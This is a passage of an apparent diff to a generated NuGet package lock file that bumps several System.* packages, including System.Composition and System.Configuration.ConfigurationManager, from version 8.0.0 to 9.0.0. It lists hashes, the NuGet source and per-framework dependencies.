["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition", "id": "System.Composition", "version": "8.0.0", "sha512": "sha512-/AZ/S+sX6awiSeSvOv7997aiwbU6HCcOBJDLecdYQJjDo+4nYCrWwWKQQIZ38VZ6BLh1pDmcYFPZockIuoRIYw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], 
"net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net462": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net47": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net471": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net472": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net48": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", 
"System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.AttributedModel", "id": "System.Composition.AttributedModel", "version": "8.0.0", "sha512": "sha512-gmEwpwXz+COPtuAASK+ichAg8+0oQAaPOV59g6fDdnt1KWbrymdixAn06bNbkdCUGcBXb8RX5k79cqg0Hqlv1g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": 
[], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.Convention", "id": "System.Composition.Convention", "version": "8.0.0", "sha512": "sha512-MP7qMadQGUcMOEyGON5dmy9T+OXubvIx04kFHvTVPfZ/9+ns8dqmFToxoF7IDzJVSWmtOQHDUP2fL1x8F6slTA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel"], "net462": ["System.Composition.AttributedModel"], "net47": ["System.Composition.AttributedModel"], "net471": ["System.Composition.AttributedModel"], "net472": ["System.Composition.AttributedModel"], "net48": ["System.Composition.AttributedModel"], "net5.0": ["System.Composition.AttributedModel"], "net6.0": ["System.Composition.AttributedModel"], "net7.0": ["System.Composition.AttributedModel"], "net8.0": ["System.Composition.AttributedModel"], "net9.0": ["System.Composition.AttributedModel"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel"], "netcoreapp2.1": ["System.Composition.AttributedModel"], "netcoreapp2.2": ["System.Composition.AttributedModel"], "netcoreapp3.0": ["System.Composition.AttributedModel"], "netcoreapp3.1": ["System.Composition.AttributedModel"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], 
"netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel"], "netstandard2.1": ["System.Composition.AttributedModel"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.Hosting", "id": "System.Composition.Hosting", "version": "8.0.0", "sha512": "sha512-HK6mWN38TLXo0jQOzR6so8cH1J8/6MzCfSsQS15bWbFEYKeonKRAZKyTC2E92o+wB1KCkocNpOy01ix61JnWjQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.Runtime"], "net462": ["System.Composition.Runtime"], "net47": ["System.Composition.Runtime"], "net471": ["System.Composition.Runtime"], "net472": ["System.Composition.Runtime"], "net48": ["System.Composition.Runtime"], "net5.0": ["System.Composition.Runtime"], "net6.0": ["System.Composition.Runtime"], "net7.0": ["System.Composition.Runtime"], "net8.0": ["System.Composition.Runtime"], "net9.0": ["System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.Runtime"], "netstandard2.1": ["System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.Runtime", "id": "System.Composition.Runtime", "version": "8.0.0", "sha512": "sha512-hgGA3KDIx9FN3WYkpMvy0pUqWAul9BTehmqq49dqPxu5E+MbUKqgksU5XRP8M9LoBPZFa8FqBbKeFgCZ3rja2w==", "sources": 
["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.TypedParts", "id": "System.Composition.TypedParts", "version": "8.0.0", "sha512": "sha512-rKu0GdZ4JYOWUF7br1W7UQFI/UgzWTU03CHY6tnTLZXCMth6YSADGJRRQYrLzpwh2+NuNcBIuv7a7x8J1xsfdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net462": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net47": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net471": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net472": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net48": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net6.0": ["System.Composition.AttributedModel", 
"System.Composition.Hosting", "System.Composition.Runtime"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "8.0.0", "sha512": "sha512-WLn7WxNMGs8+pboojHpid8CJiNhcr2j7kA0gmI8fgU5LF0JGKGqHhSSHc8WW0h77svQSS29KO+hr+xKeuS2J9A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData"], "net462": [], 
"net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Security.Cryptography.ProtectedData"], "net6.0": ["System.Security.Cryptography.ProtectedData"], "net7.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Cryptography.ProtectedData"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "8.0.0", "sha512": "sha512-um5/JzI6kqUKdoRX4qtIrMql36C6GQgspx2ntHO3HNO23QNuRC4Qn8Fe+7TCZ4gamEQJeuTt3Dy4hxUsjJURpQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": 
[], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "9.0.0", "sha512": "sha512-z/Oo7nxWmZ0Y578vj8EUVrFJZ3DX6OMuUGlgeYgeeUZOFGT89XfaM8fDFMvJy6+mOIqW6ux5NdNzEnlTnQGJ7A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, 
"targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition", "id": "System.Composition", "version": "9.0.0", "sha512": "sha512-aWcyK90nIChHyxq7rpQ83Bbvt/t9l1X6yQtkvODaZ+rJlYHUMVpSji0YXIZTX5VlcWRCVRFdeEY767BCOzueaw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net462": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net47": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net471": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net472": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net48": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", 
"System.Composition.TypedParts"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.AttributedModel", "id": 
"System.Composition.AttributedModel", "version": "9.0.0", "sha512": "sha512-oYuQzlIvO31GxSlTo6NCU+RnK9dVb1m154BNE7VGm9PUyJM+RrOQss8cNbMj+iIWVcp6VRnyJlBJ3MfzYo14AA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.Convention", "id": "System.Composition.Convention", "version": "9.0.0", "sha512": "sha512-3efhxn/7hQI9kNy6M6UUwWrMJCzdBZZ4hkYS3MUxqXyGdQ2sLCWToX1nLnnrRYafcdRSMOY2naMPNlRAEKDAGA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel"], "net462": ["System.Composition.AttributedModel"], "net47": ["System.Composition.AttributedModel"], "net471": ["System.Composition.AttributedModel"], "net472": ["System.Composition.AttributedModel"], "net48": ["System.Composition.AttributedModel"], "net5.0": ["System.Composition.AttributedModel"], "net6.0": ["System.Composition.AttributedModel"], "net7.0": ["System.Composition.AttributedModel"], "net8.0": ["System.Composition.AttributedModel"], "net9.0": ["System.Composition.AttributedModel"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": 
["System.Composition.AttributedModel"], "netcoreapp2.1": ["System.Composition.AttributedModel"], "netcoreapp2.2": ["System.Composition.AttributedModel"], "netcoreapp3.0": ["System.Composition.AttributedModel"], "netcoreapp3.1": ["System.Composition.AttributedModel"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel"], "netstandard2.1": ["System.Composition.AttributedModel"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.Hosting", "id": "System.Composition.Hosting", "version": "9.0.0", "sha512": "sha512-zLPGbMYw6y2GoNBjcoPnvXt7wSJM/qIG1fU2Do8kDObDTYWHG6fFOhulSViX0Ip2j+qGeuCESqEswCRG+xDvwA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.Runtime"], "net462": ["System.Composition.Runtime"], "net47": ["System.Composition.Runtime"], "net471": ["System.Composition.Runtime"], "net472": ["System.Composition.Runtime"], "net48": ["System.Composition.Runtime"], "net5.0": ["System.Composition.Runtime"], "net6.0": ["System.Composition.Runtime"], "net7.0": ["System.Composition.Runtime"], "net8.0": ["System.Composition.Runtime"], "net9.0": ["System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.Runtime"], 
"netstandard2.1": ["System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.Runtime", "id": "System.Composition.Runtime", "version": "9.0.0", "sha512": "sha512-P777aBPIwmLvL0Q8mPA7RiiomfjqLTbpX/xzKpk7YTJLcvPDMTvRIfNFognEpfJYRLadBymaBIU81vW3MzZYnA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.TypedParts", "id": "System.Composition.TypedParts", "version": "9.0.0", "sha512": "sha512-7b7mkn4H0149jNKD1tZRUG2gmkszNzO6YAGV+xEsxdfIU+5SLhxWRYJpqm1zKzKNdzpKUW93oyEFGcTuoNvqGg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net462": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net47": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net471": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net472": ["System.Composition.AttributedModel", 
"System.Composition.Hosting", "System.Composition.Runtime"], "net48": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "9.0.0", "sha512": 
"sha512-RMASWXcds+sKAl/W6itFM8hvq9aha8CRqSv2nrjb8TUTSMLjjn80h1Lrob7km+v/1UfpUU/Nr67egAjZjsCgIw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Security.Cryptography.ProtectedData"], "net6.0": ["System.Security.Cryptography.ProtectedData"], "net7.0": ["System.Security.Cryptography.ProtectedData"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Cryptography.ProtectedData"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "9.0.0", "sha512": "sha512-ouyDUtZFOgkAPYmYUzioIjMxmgdI/E3j1sIuAbkXv4cTFOisf5FvQrbwi0KC84GUJMjkImXbaZqlTH9M5dJz2Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], 
